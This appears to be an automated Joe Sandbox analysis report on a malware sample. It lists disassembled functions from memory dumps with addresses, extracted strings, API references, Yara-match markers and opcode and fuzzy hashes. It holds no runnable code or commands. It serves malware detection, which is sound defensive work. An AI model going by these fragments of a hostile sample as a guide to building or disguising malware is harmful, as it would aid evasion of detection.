Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: AHO:$JJ]T$YC$5SZ
API String ID: 0-2490005371
Opcode ID: feebafc654e979264e90c21ba2b1881588683e24757a38bce0128486bd9e14fa
Instruction ID: e94d2115965d1ab6ac96aac8376d1a40ab417ef6fefd94c623d280ac089919e2
Opcode Fuzzy Hash: feebafc654e979264e90c21ba2b1881588683e24757a38bce0128486bd9e14fa
Instruction Fuzzy Hash: E1916A74104B508BD326CF35D4A47A3BBE2BF9A304F544A4DC4EB0B286C77A7515CB99

Function 00422AC1 Relevance: 4.2, Strings: 3, Instructions: 401COMMON

Download Yara Rule

Strings

',$/, xrefs: 00422C06
789:, xrefs: 00422F48
4$#>, xrefs: 00422BF6

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ',$/$4$#>$789:
API String ID: 0-1840935103
Opcode ID: a2a8a5796c28d353f8f4f0f4747fea83c1d1e90dd7900e91c256a6eb3ea2a698
Instruction ID: 3a3c7d2e22556545ba37e3b70c36f6a9ac53c660036a41dbf512def7203dd6ce
Opcode Fuzzy Hash: a2a8a5796c28d353f8f4f0f4747fea83c1d1e90dd7900e91c256a6eb3ea2a698
Instruction Fuzzy Hash: A4D1CC75A083519FD714CF29E88072BB7E2BBC9314F594A2DE98987392D774EC01CB86

Function 028D17D7 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

/, xrefs: 028D1BAB
789:, xrefs: 028D18ED
%, xrefs: 028D1BB3

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 789:$%$/
API String ID: 0-3498975593
Opcode ID: d2f73dc8301a412a5c5747fc455ffad99bfcd6725f5424367be8d5d7216d8b64
Instruction ID: 78f8242151ae66f047267f820f8c515681346b546c51f3c0f8d062988f30a20f
Opcode Fuzzy Hash: d2f73dc8301a412a5c5747fc455ffad99bfcd6725f5424367be8d5d7216d8b64
Instruction Fuzzy Hash: 42C1DEB9A083429BD714CF18C884B6BB7E2EF95354F18892CE5C9C7351E735E849CB92

Function 028C83F9 Relevance: 4.1, Strings: 3, Instructions: 333COMMON

Download Yara Rule

Strings

m, xrefs: 028C8411
65, xrefs: 028C865B
IO, xrefs: 028C84A8

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 65$m$IO
API String ID: 0-3769717654
Opcode ID: 8fc31a7bd1d5c29bff9cb6d534a1f6030555883298265af9a5c8a5f6dbaede40
Instruction ID: d85ea8e4423e3f18cef8c2b8ca35296182bd5e49346fd0cad46349e985dc1a90
Opcode Fuzzy Hash: 8fc31a7bd1d5c29bff9cb6d534a1f6030555883298265af9a5c8a5f6dbaede40
Instruction Fuzzy Hash: 5BC177B96483409FDB14CF04C89166FBBE2EFD6398F14492CE8899B361D734D985CB86

Function 028C7F91 Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

guc{, xrefs: 028C824B
crvi, xrefs: 028C82B5
3, xrefs: 028C815A

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: crvi$guc{$3
API String ID: 0-3059600650
Opcode ID: 6aee983b1d10a6d1652b0eb12904589eb0463ddbdbfc9b2800f4525f7b5ccdb0
Instruction ID: e30c5e7dc52e8b3b77efffc47ff9957e34992009218f46cd7abb5b463d2f08ba
Opcode Fuzzy Hash: 6aee983b1d10a6d1652b0eb12904589eb0463ddbdbfc9b2800f4525f7b5ccdb0
Instruction Fuzzy Hash: 52B18E7864C3808FD725CF28C4907AABBE2AF96358F18896DE4D9CB381D735D845CB52

Function 028B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 028B09DC, 028B09DF, 028B09E4
., xrefs: 028B095F
l, xrefs: 028B0966

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: b1024c1b30b09891f6103e385990c2dd1d91f62b3362798cd4bfe391a925b146
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: AA3137BA900609DFDB11CF99C880AEEBBF5FF48328F14414AD445E7351D771AA45CBA4

Function 028B6197 Relevance: 3.4, Strings: 2, Instructions: 886COMMON

Download Yara Rule

Strings

8, xrefs: 028B6BAF
0, xrefs: 028B6BB7

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: e1b6f605487822a9edefa4b6efc1f1d48239c7fffd323b51f84c4917a11a40e3
Instruction ID: 122d4579520c31c37b92f968ab0a6fb291dca4f48ce6f2f4cc071276659b26dd
Opcode Fuzzy Hash: e1b6f605487822a9edefa4b6efc1f1d48239c7fffd323b51f84c4917a11a40e3
Instruction Fuzzy Hash: 24826A796083509FD725CF28C840B9BBBE5BF88318F08892DF99987391E775D944CB92

Function 00405F30 Relevance: 3.4, Strings: 2, Instructions: 886COMMON

Download Yara Rule

Strings

0, xrefs: 00406950
8, xrefs: 00406948

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: e1ba4efd13e2896f79e3e28a8a5d518532810379ced532b95419972f373df089
Instruction ID: 6a8942316129381cb36dec3a3499666bc02a1d611bfa52d8fef7d6638abf240b
Opcode Fuzzy Hash: e1ba4efd13e2896f79e3e28a8a5d518532810379ced532b95419972f373df089
Instruction Fuzzy Hash: 5D8259716083409FD724CF28C840B9BBBE2BF88314F15892EF88A97391D779D955CB96

Function 028D4519 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

IP, xrefs: 028D4901
[M, xrefs: 028D48FA

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: IP$[M
API String ID: 0-4017197820
Opcode ID: ce0fd57049a8497041f3025252edbe4a0900f8cd1c514417a6ec2afda2d977d4
Instruction ID: 136375e1df603ee5cb0fa5f10416d3aefe1312755ff3451ffac597ef19655bca
Opcode Fuzzy Hash: ce0fd57049a8497041f3025252edbe4a0900f8cd1c514417a6ec2afda2d977d4
Instruction Fuzzy Hash: 6F224878200B018FD725CF29C891B66B7F2FF46314F14895DD8AA8BBA2D774E845CB94

Function 00425920 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

", xrefs: 00425D9F
", xrefs: 00425D20

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: 7aae8db64efe925f33980f60581cdbaaf382e9657070e3a43f351d4e08a46b2b
Instruction ID: 029d2a81860a4bde834f3ff3ae8034cf58d36d8025ef30e1c181660066ed2413
Opcode Fuzzy Hash: 7aae8db64efe925f33980f60581cdbaaf382e9657070e3a43f351d4e08a46b2b
Instruction Fuzzy Hash: D9024871B087609FC714CF29E49463BB7D5AFC4314F988A2FE89987381D638DC45878A

Function 028D73A8 Relevance: 3.0, Strings: 2, Instructions: 470COMMON

Download Yara Rule

Strings

cfbe, xrefs: 028D764F
2PBb, xrefs: 028D7A36

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 2PBb$cfbe
API String ID: 0-517685108
Opcode ID: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction ID: a25bb74a73e99b5da6fca42c3b1840b1e94b66e3f06e700ea24b58948d98f85f
Opcode Fuzzy Hash: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction Fuzzy Hash: 54F17D78504B818FD729CF38C494BE3BBE1AF56309F084A5DC0EB8B292D779A549CB54

Function 028B56C7 Relevance: 3.0, Strings: 2, Instructions: 451COMMON

Download Yara Rule

Strings

IEND, xrefs: 028B5B99
), xrefs: 028B5778

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 652d2c7e87a85901377227d95560b9378b1016cb294ce33098a1212efe0b6641
Instruction ID: 22662f4458a74c4463364fb712262eb04d0d9f8f663e040782d070052797ff75
Opcode Fuzzy Hash: 652d2c7e87a85901377227d95560b9378b1016cb294ce33098a1212efe0b6641
Instruction Fuzzy Hash: BAF1F179A083449FD725CF28CC8079ABBE1AF84304F44852DF999DB391D779E904CB82

Function 004242B2 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

IP, xrefs: 004242C2
[M, xrefs: 004242BB

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: IP$[M
API String ID: 0-4017197820
Opcode ID: 9816a9bf08fab1fdaeea0c28339d091773f8ddb33ca7dbf2b0315f8c837a9dcc
Instruction ID: b3c57116afc10e7119c3cd764a18fe336843f4a3cdcf224629ed181af22ef122
Opcode Fuzzy Hash: 9816a9bf08fab1fdaeea0c28339d091773f8ddb33ca7dbf2b0315f8c837a9dcc
Instruction Fuzzy Hash: 44B12771600B118FD325CF29D490B62B7F1FF86314F14895ED89A8BBA6E778E841CB94

Function 0041D75D Relevance: 2.4, APIs: 1, Instructions: 875COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 006d50049d3e5e011efdf29e049a16c245cae7292e5eff2ed98d43689107f87b
Instruction ID: f9e56a82b05e1df0b453c80ea583c6e607638f02eae9a17844a3f9c670613295
Opcode Fuzzy Hash: 006d50049d3e5e011efdf29e049a16c245cae7292e5eff2ed98d43689107f87b
Instruction Fuzzy Hash: 2F62A979614B01CFD728CF29D890A62B3E2FF4A715F18896DD496877A1DB38F942CB04

Function 0040105C Relevance: 2.1, Strings: 1, Instructions: 893COMMON

Download Yara Rule

Strings

JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ, xrefs: 00401438

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ
API String ID: 0-2695270438
Opcode ID: f4495b8307a68494cd019a634ad2b0ac0c9f59ca6c57951b7228fedb697986cc
Instruction ID: 5a53960e5e99ff852378f1f3cacc28ccea2b8a6316681f3d1666e51c591a0de8
Opcode Fuzzy Hash: f4495b8307a68494cd019a634ad2b0ac0c9f59ca6c57951b7228fedb697986cc
Instruction Fuzzy Hash: BF72D479D18155CFEB04CF74E8512EABBB1FB4A311F1984B5C640A7391C3399A61CFA4

Function 028DBB5F Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 028DBB68

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8b0e6c68bd49d71366e1393b5992a8cfc6088dcbed3f9a7a8395df447fb745c1
Instruction ID: 4db5b3d140fb96d7121152e8bcc647a97328f32a776eead1793fb06bb64954cf
Opcode Fuzzy Hash: 8b0e6c68bd49d71366e1393b5992a8cfc6088dcbed3f9a7a8395df447fb745c1
Instruction Fuzzy Hash: CAC1A079605B418FC329CE38C890756B7E2BF99328F198B6CD5AACB7D5D731A806C740

Function 0042B8F8 Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0042B901

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 4d13329090cbe463d7c366539e778e4ec2962df2ea30f0725a372aa2719e88d2
Instruction ID: 42be1e3cf22912501ef8412a887be0e9569f9cf30671d2b51b0db905474ce322
Opcode Fuzzy Hash: 4d13329090cbe463d7c366539e778e4ec2962df2ea30f0725a372aa2719e88d2
Instruction Fuzzy Hash: 30C1CF72705B418BC329CA38C890756B7E2FF99324F588B6DC5AA8B7D5D735A802C781

Function 00423354 Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

A, xrefs: 00423418

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-837457580
Opcode ID: 85e7ddc82aafc264c40fef1a7fc8f4fcd643626b763fd81fc1e9b6dde942b2f2
Instruction ID: dc9e3d6a0112926aef596b563eb1d738a036f633008c4ab63600aaa2aeca024c
Opcode Fuzzy Hash: 85e7ddc82aafc264c40fef1a7fc8f4fcd643626b763fd81fc1e9b6dde942b2f2
Instruction Fuzzy Hash: 9502E0716083918FD718CF28D89071ABBF2AFCA711F488A6EE4958B3D1C379D901CB56

Function 028B9927 Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

C, xrefs: 028B9D44

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: C
API String ID: 0-2515487769
Opcode ID: 7ca93d528caa81f148600c8337d4a07c8f607280ba0f7e9f0830643f593573c6
Instruction ID: 4e27b2eaf1541cbec5143cbfe5c14841d33b3a46367322bd0f4483027ef83b5f
Opcode Fuzzy Hash: 7ca93d528caa81f148600c8337d4a07c8f607280ba0f7e9f0830643f593573c6
Instruction Fuzzy Hash: 43E12C79A0C7518BC31A8E29C8D02AAFBE3AFC5314F2D8A2DD5D597395D7789801CF81

Function 00439E00 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

`123, xrefs: 00439E46

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: `123
API String ID: 0-1835766495
Opcode ID: 87dc4cd516f2908d47f2f3a3cfbef89627638494afaffc00369c92b2e4d8ee3e
Instruction ID: 9fda998e5b53779469197c407c0096829d25e13110f56e14b6d3980a5ca47b81
Opcode Fuzzy Hash: 87dc4cd516f2908d47f2f3a3cfbef89627638494afaffc00369c92b2e4d8ee3e
Instruction Fuzzy Hash: 17D1AB36A5C211CFC704CF28D8D066AB7E1FB8A315F19897DD99987361C738E852CB85

Function 00439F10 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

6edc, xrefs: 00439F48

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 6edc
API String ID: 0-1865609195
Opcode ID: efcc31ad576bb0ab1bf98ad8bc1f82b9fe1e38a74fe7556d5d478581d6f056a3
Instruction ID: a947bf4d82c33b04369e6d94e994cd5a436f32f2cc8dd5924b30dc13854a369a
Opcode Fuzzy Hash: efcc31ad576bb0ab1bf98ad8bc1f82b9fe1e38a74fe7556d5d478581d6f056a3
Instruction Fuzzy Hash: 16C1BF76A5C211CFC704CF28D89065AB7E2FF8A314F19997DE89987361D738E842CB85

Function 028C8A6E Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

JM, xrefs: 028C8C39

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: JM
API String ID: 0-1126336605
Opcode ID: c4038672b05fe9c0286992e0aa91722f0722b4ca5779e264c8f9d9b684047ac5
Instruction ID: 33b74953647d86b60808709ffd923d2c195dfced6eefe99971cd343d103fb787
Opcode Fuzzy Hash: c4038672b05fe9c0286992e0aa91722f0722b4ca5779e264c8f9d9b684047ac5
Instruction Fuzzy Hash: D7A19AB85083418BC725CF18C891B6BB7F1FF86318F148A1CE89A9B391E774D945CB86

Function 028D68C7 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

XXSR, xrefs: 028D6A84

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: XXSR
API String ID: 0-1503770902
Opcode ID: 6b4b5238bc354e4c6f97065c5e6529fe4172b9814de126df8102ac6f8c4c8079
Instruction ID: f78366961ad82da7d13b04f02d5055353c963ba412dfb0137ee7fac852e40b93
Opcode Fuzzy Hash: 6b4b5238bc354e4c6f97065c5e6529fe4172b9814de126df8102ac6f8c4c8079
Instruction Fuzzy Hash: 9991367C1047A58BD7288F399090766FBE6BF56218F18866DC4EB8B782E334A44DCB15

Function 00426660 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

XXSR, xrefs: 0042681D

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: XXSR
API String ID: 0-1503770902
Opcode ID: 3300ca780a6572115ef58226ef7a9cc96e6e10f625673a8631c78ac36c35c7a8
Instruction ID: 3f6c5290344e5c4500dd3b4d36036e16ab1f49c7d610ea51dbb7ce8487f4ca7e
Opcode Fuzzy Hash: 3300ca780a6572115ef58226ef7a9cc96e6e10f625673a8631c78ac36c35c7a8
Instruction Fuzzy Hash: 659139742057A08BD7298F399090767FBE2BF96304F55465EC4EB4B3C2D738A405CB59

Function 00407310 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

,, xrefs: 00407473

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8a753e4ef43d9ac7563a6a5f7ca00e3c6cdc60860491f2aa2964d0dae52d4717
Instruction ID: 3735952492d2333ef5bfa57caaa27b36288f665e643391f15751e645f0eb639e
Opcode Fuzzy Hash: 8a753e4ef43d9ac7563a6a5f7ca00e3c6cdc60860491f2aa2964d0dae52d4717
Instruction Fuzzy Hash: A9B1287150D381ABD315CF68C84465BBFE0AF95304F444A2EF88897782C375EA18CB97

Function 0041289B Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

EO, xrefs: 004128AA

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: EO
API String ID: 0-716502462
Opcode ID: 27f4ff9b13142879e679f16fca5a89f29232179e29fa4f1bfb122cc2db08d835
Instruction ID: d6dec2e545dc0dd92d11149f06fff2085007f669165bdb82671efb9ea63001e9
Opcode Fuzzy Hash: 27f4ff9b13142879e679f16fca5a89f29232179e29fa4f1bfb122cc2db08d835
Instruction Fuzzy Hash: 9E5189716082408FD355EF28C890B6EFBF5AF86344F14492DE2C5C72A2D73AD996CB16

Function 028C463A Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

x, xrefs: 028C46E1

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction ID: 2f8aa6fd92838be3aa50d188e9a74d5f2f2d23770d3d6abbca3b8da793cbd97f
Opcode Fuzzy Hash: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction Fuzzy Hash: 3241E7756183808FD325CF68C8A4B9BF7E2BFC6304F58492DE489CB291D7B99505CB46

Function 004143D3 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

x, xrefs: 0041447A

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction ID: 5f2d7fbc2b5577e837b7b8346eb4e3c1362b790c53a7d6c6f5ad7e7c89a45094
Opcode Fuzzy Hash: 948ad9c121d3e29f70d134d7cbf671f7d776961e7525d64e3c51cf259919b8b7
Instruction Fuzzy Hash: 5B41D5716183808FD325CF68C495BDBFBE2BBC6304F484D2DE4899B281D7B99A05CB56

Function 028C7A74 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

%$', xrefs: 028C7B66

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: %$'
API String ID: 0-1094439344
Opcode ID: 26ed338586cfba176d84cc2ff46e339150741026b7d8b80401dd3f66e51d40b2
Instruction ID: 40e01af17e15b7fadb78f2213c3323924d071e44b619d64991bf0d2975ac4bad
Opcode Fuzzy Hash: 26ed338586cfba176d84cc2ff46e339150741026b7d8b80401dd3f66e51d40b2
Instruction Fuzzy Hash: 1D41DE79604A419FD725CF2EC890A11FBF2BF5A304B64899DD58ACB721D736E911CF80

Function 00417C90 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

%$', xrefs: 004178FF

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: %$'
API String ID: 0-1094439344
Opcode ID: bca067881cd522fe5ce8e007681ddd95bf7d43ac73d3e2e8718a4ea40a2312dc
Instruction ID: 738eb74805bb83f3337e8e33e5fb2b644e700e810b3f74be095d1f0a826b0b31
Opcode Fuzzy Hash: bca067881cd522fe5ce8e007681ddd95bf7d43ac73d3e2e8718a4ea40a2312dc
Instruction Fuzzy Hash: 9A31A975604600DFE720CF2AC880B56BBF1FF0A304F54896DE58A8B761D735E950CB95

Function 028E85B8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

0C1, xrefs: 028E8636

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0C1
API String ID: 0-488757619
Opcode ID: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction ID: 568b009a9e4c1ba716da6b3804462d6148324acfce78c01fce6a7c0ce3a1b005
Opcode Fuzzy Hash: 38f68099f016c08fdd78a9a3f511e142b8d6a6c5d249821d0972f2918d2af20b
Instruction Fuzzy Hash: 0011E5752112028FD768CF18C595B2AF7F2FB4A304B299A5DD0C6DBB52C735E846CB84

Function 00438351 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

0C1, xrefs: 004383CF

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

